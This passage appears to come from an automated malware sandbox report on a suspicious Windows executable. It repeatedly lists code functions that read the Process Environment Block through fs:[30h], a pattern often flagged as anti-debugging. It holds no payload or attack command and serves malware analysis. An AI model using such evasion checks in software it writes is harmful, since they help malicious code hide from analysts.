                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A72349 mov eax, dword ptr fs:[00000030h]2_2_01A72349
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABA352 mov eax, dword ptr fs:[00000030h]2_2_01ABA352
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A98350 mov ecx, dword ptr fs:[00000030h]2_2_01A98350
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7035C mov eax, dword ptr fs:[00000030h]2_2_01A7035C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7035C mov eax, dword ptr fs:[00000030h]2_2_01A7035C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7035C mov eax, dword ptr fs:[00000030h]2_2_01A7035C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7035C mov ecx, dword ptr fs:[00000030h]2_2_01A7035C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7035C mov eax, dword ptr fs:[00000030h]2_2_01A7035C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7035C mov eax, dword ptr fs:[00000030h]2_2_01A7035C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A002A0 mov eax, dword ptr fs:[00000030h]2_2_01A002A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A002A0 mov eax, dword ptr fs:[00000030h]2_2_01A002A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A862A0 mov eax, dword ptr fs:[00000030h]2_2_01A862A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A862A0 mov ecx, dword ptr fs:[00000030h]2_2_01A862A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A862A0 mov eax, dword ptr fs:[00000030h]2_2_01A862A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A862A0 mov eax, dword ptr fs:[00000030h]2_2_01A862A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A862A0 mov eax, dword ptr fs:[00000030h]2_2_01A862A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A862A0 mov eax, dword ptr fs:[00000030h]2_2_01A862A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A70283 mov eax, dword ptr fs:[00000030h]2_2_01A70283
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A70283 mov eax, dword ptr fs:[00000030h]2_2_01A70283
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A70283 mov eax, dword ptr fs:[00000030h]2_2_01A70283
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E284 mov eax, dword ptr fs:[00000030h]2_2_01A2E284
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E284 mov eax, dword ptr fs:[00000030h]2_2_01A2E284
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A002E1 mov eax, dword ptr fs:[00000030h]2_2_01A002E1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A002E1 mov eax, dword ptr fs:[00000030h]2_2_01A002E1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A002E1 mov eax, dword ptr fs:[00000030h]2_2_01A002E1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA2C3 mov eax, dword ptr fs:[00000030h]2_2_019FA2C3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA2C3 mov eax, dword ptr fs:[00000030h]2_2_019FA2C3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA2C3 mov eax, dword ptr fs:[00000030h]2_2_019FA2C3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA2C3 mov eax, dword ptr fs:[00000030h]2_2_019FA2C3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA2C3 mov eax, dword ptr fs:[00000030h]2_2_019FA2C3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019E823B mov eax, dword ptr fs:[00000030h]2_2_019E823B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F6259 mov eax, dword ptr fs:[00000030h]2_2_019F6259
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EA250 mov eax, dword ptr fs:[00000030h]2_2_019EA250
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA0274 mov eax, dword ptr fs:[00000030h]2_2_01AA0274
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A78243 mov eax, dword ptr fs:[00000030h]2_2_01A78243
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A78243 mov ecx, dword ptr fs:[00000030h]2_2_01A78243
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019E826B mov eax, dword ptr fs:[00000030h]2_2_019E826B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AAA250 mov eax, dword ptr fs:[00000030h]2_2_01AAA250
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AAA250 mov eax, dword ptr fs:[00000030h]2_2_01AAA250
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F4260 mov eax, dword ptr fs:[00000030h]2_2_019F4260
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F4260 mov eax, dword ptr fs:[00000030h]2_2_019F4260
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F4260 mov eax, dword ptr fs:[00000030h]2_2_019F4260
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A705A7 mov eax, dword ptr fs:[00000030h]2_2_01A705A7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A705A7 mov eax, dword ptr fs:[00000030h]2_2_01A705A7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A705A7 mov eax, dword ptr fs:[00000030h]2_2_01A705A7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A145B1 mov eax, dword ptr fs:[00000030h]2_2_01A145B1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A145B1 mov eax, dword ptr fs:[00000030h]2_2_01A145B1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F2582 mov eax, dword ptr fs:[00000030h]2_2_019F2582
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F2582 mov ecx, dword ptr fs:[00000030h]2_2_019F2582
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A24588 mov eax, dword ptr fs:[00000030h]2_2_01A24588
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E59C mov eax, dword ptr fs:[00000030h]2_2_01A2E59C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E5E7 mov eax, dword ptr fs:[00000030h]2_2_01A1E5E7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E5E7 mov eax, dword ptr fs:[00000030h]2_2_01A1E5E7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E5E7 mov eax, dword ptr fs:[00000030h]2_2_01A1E5E7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E5E7 mov eax, dword ptr fs:[00000030h]2_2_01A1E5E7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E5E7 mov eax, dword ptr fs:[00000030h]2_2_01A1E5E7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E5E7 mov eax, dword ptr fs:[00000030h]2_2_01A1E5E7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E5E7 mov eax, dword ptr fs:[00000030h]2_2_01A1E5E7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E5E7 mov eax, dword ptr fs:[00000030h]2_2_01A1E5E7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F65D0 mov eax, dword ptr fs:[00000030h]2_2_019F65D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2C5ED mov eax, dword ptr fs:[00000030h]2_2_01A2C5ED
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2C5ED mov eax, dword ptr fs:[00000030h]2_2_01A2C5ED
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E5CF mov eax, dword ptr fs:[00000030h]2_2_01A2E5CF
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E5CF mov eax, dword ptr fs:[00000030h]2_2_01A2E5CF
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A5D0 mov eax, dword ptr fs:[00000030h]2_2_01A2A5D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A5D0 mov eax, dword ptr fs:[00000030h]2_2_01A2A5D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F25E0 mov eax, dword ptr fs:[00000030h]2_2_019F25E0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00535 mov eax, dword ptr fs:[00000030h]2_2_01A00535
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00535 mov eax, dword ptr fs:[00000030h]2_2_01A00535
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00535 mov eax, dword ptr fs:[00000030h]2_2_01A00535
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00535 mov eax, dword ptr fs:[00000030h]2_2_01A00535
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00535 mov eax, dword ptr fs:[00000030h]2_2_01A00535
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00535 mov eax, dword ptr fs:[00000030h]2_2_01A00535
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E53E mov eax, dword ptr fs:[00000030h]2_2_01A1E53E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E53E mov eax, dword ptr fs:[00000030h]2_2_01A1E53E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E53E mov eax, dword ptr fs:[00000030h]2_2_01A1E53E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E53E mov eax, dword ptr fs:[00000030h]2_2_01A1E53E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E53E mov eax, dword ptr fs:[00000030h]2_2_01A1E53E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A86500 mov eax, dword ptr fs:[00000030h]2_2_01A86500
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC4500 mov eax, dword ptr fs:[00000030h]2_2_01AC4500
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC4500 mov eax, dword ptr fs:[00000030h]2_2_01AC4500
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC4500 mov eax, dword ptr fs:[00000030h]2_2_01AC4500
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC4500 mov eax, dword ptr fs:[00000030h]2_2_01AC4500
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC4500 mov eax, dword ptr fs:[00000030h]2_2_01AC4500
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC4500 mov eax, dword ptr fs:[00000030h]2_2_01AC4500
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC4500 mov eax, dword ptr fs:[00000030h]2_2_01AC4500
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2656A mov eax, dword ptr fs:[00000030h]2_2_01A2656A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2656A mov eax, dword ptr fs:[00000030h]2_2_01A2656A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2656A mov eax, dword ptr fs:[00000030h]2_2_01A2656A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F8550 mov eax, dword ptr fs:[00000030h]2_2_019F8550
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F8550 mov eax, dword ptr fs:[00000030h]2_2_019F8550
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A244B0 mov ecx, dword ptr fs:[00000030h]2_2_01A244B0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7A4B0 mov eax, dword ptr fs:[00000030h]2_2_01A7A4B0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AAA49A mov eax, dword ptr fs:[00000030h]2_2_01AAA49A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F64AB mov eax, dword ptr fs:[00000030h]2_2_019F64AB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F04E5 mov ecx, dword ptr fs:[00000030h]2_2_019F04E5
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A76420 mov eax, dword ptr fs:[00000030h]2_2_01A76420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A76420 mov eax, dword ptr fs:[00000030h]2_2_01A76420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A76420 mov eax, dword ptr fs:[00000030h]2_2_01A76420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A76420 mov eax, dword ptr fs:[00000030h]2_2_01A76420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A76420 mov eax, dword ptr fs:[00000030h]2_2_01A76420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A76420 mov eax, dword ptr fs:[00000030h]2_2_01A76420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A76420 mov eax, dword ptr fs:[00000030h]2_2_01A76420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A430 mov eax, dword ptr fs:[00000030h]2_2_01A2A430
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A28402 mov eax, dword ptr fs:[00000030h]2_2_01A28402
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A28402 mov eax, dword ptr fs:[00000030h]2_2_01A28402
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A28402 mov eax, dword ptr fs:[00000030h]2_2_01A28402
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EC427 mov eax, dword ptr fs:[00000030h]2_2_019EC427
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EE420 mov eax, dword ptr fs:[00000030h]2_2_019EE420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EE420 mov eax, dword ptr fs:[00000030h]2_2_019EE420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019EE420 mov eax, dword ptr fs:[00000030h]2_2_019EE420
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019E645D mov eax, dword ptr fs:[00000030h]2_2_019E645D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7C460 mov ecx, dword ptr fs:[00000030h]2_2_01A7C460
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1A470 mov eax, dword ptr fs:[00000030h]2_2_01A1A470
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1A470 mov eax, dword ptr fs:[00000030h]2_2_01A1A470
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1A470 mov eax, dword ptr fs:[00000030h]2_2_01A1A470
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E443 mov eax, dword ptr fs:[00000030h]2_2_01A2E443
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E443 mov eax, dword ptr fs:[00000030h]2_2_01A2E443
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E443 mov eax, dword ptr fs:[00000030h]2_2_01A2E443
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E443 mov eax, dword ptr fs:[00000030h]2_2_01A2E443
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E443 mov eax, dword ptr fs:[00000030h]2_2_01A2E443
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E443 mov eax, dword ptr fs:[00000030h]2_2_01A2E443
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E443 mov eax, dword ptr fs:[00000030h]2_2_01A2E443
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2E443 mov eax, dword ptr fs:[00000030h]2_2_01A2E443
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1245A mov eax, dword ptr fs:[00000030h]2_2_01A1245A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AAA456 mov eax, dword ptr fs:[00000030h]2_2_01AAA456
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA47A0 mov eax, dword ptr fs:[00000030h]2_2_01AA47A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9678E mov eax, dword ptr fs:[00000030h]2_2_01A9678E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F07AF mov eax, dword ptr fs:[00000030h]2_2_019F07AF
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7E7E1 mov eax, dword ptr fs:[00000030h]2_2_01A7E7E1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A127ED mov eax, dword ptr fs:[00000030h]2_2_01A127ED
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A127ED mov eax, dword ptr fs:[00000030h]2_2_01A127ED
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A127ED mov eax, dword ptr fs:[00000030h]2_2_01A127ED
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FC7C0 mov eax, dword ptr fs:[00000030h]2_2_019FC7C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F47FB mov eax, dword ptr fs:[00000030h]2_2_019F47FB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F47FB mov eax, dword ptr fs:[00000030h]2_2_019F47FB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A707C3 mov eax, dword ptr fs:[00000030h]2_2_01A707C3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2C720 mov eax, dword ptr fs:[00000030h]2_2_01A2C720
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2C720 mov eax, dword ptr fs:[00000030h]2_2_01A2C720
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F0710 mov eax, dword ptr fs:[00000030h]2_2_019F0710
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6C730 mov eax, dword ptr fs:[00000030h]2_2_01A6C730
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2273C mov eax, dword ptr fs:[00000030h]2_2_01A2273C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2273C mov ecx, dword ptr fs:[00000030h]2_2_01A2273C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2273C mov eax, dword ptr fs:[00000030h]2_2_01A2273C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2C700 mov eax, dword ptr fs:[00000030h]2_2_01A2C700
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A20710 mov eax, dword ptr fs:[00000030h]2_2_01A20710
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F0750 mov eax, dword ptr fs:[00000030h]2_2_019F0750
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F8770 mov eax, dword ptr fs:[00000030h]2_2_019F8770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2674D mov esi, dword ptr fs:[00000030h]2_2_01A2674D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2674D mov eax, dword ptr fs:[00000030h]2_2_01A2674D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2674D mov eax, dword ptr fs:[00000030h]2_2_01A2674D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A74755 mov eax, dword ptr fs:[00000030h]2_2_01A74755
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32750 mov eax, dword ptr fs:[00000030h]2_2_01A32750
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32750 mov eax, dword ptr fs:[00000030h]2_2_01A32750
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7E75D mov eax, dword ptr fs:[00000030h]2_2_01A7E75D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2C6A6 mov eax, dword ptr fs:[00000030h]2_2_01A2C6A6
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F4690 mov eax, dword ptr fs:[00000030h]2_2_019F4690
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F4690 mov eax, dword ptr fs:[00000030h]2_2_019F4690
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A266B0 mov eax, dword ptr fs:[00000030h]2_2_01A266B0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6E6F2 mov eax, dword ptr fs:[00000030h]2_2_01A6E6F2
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6E6F2 mov eax, dword ptr fs:[00000030h]2_2_01A6E6F2
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6E6F2 mov eax, dword ptr fs:[00000030h]2_2_01A6E6F2
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6E6F2 mov eax, dword ptr fs:[00000030h]2_2_01A6E6F2
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A706F1 mov eax, dword ptr fs:[00000030h]2_2_01A706F1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A706F1 mov eax, dword ptr fs:[00000030h]2_2_01A706F1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A6C7 mov ebx, dword ptr fs:[00000030h]2_2_01A2A6C7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A6C7 mov eax, dword ptr fs:[00000030h]2_2_01A2A6C7
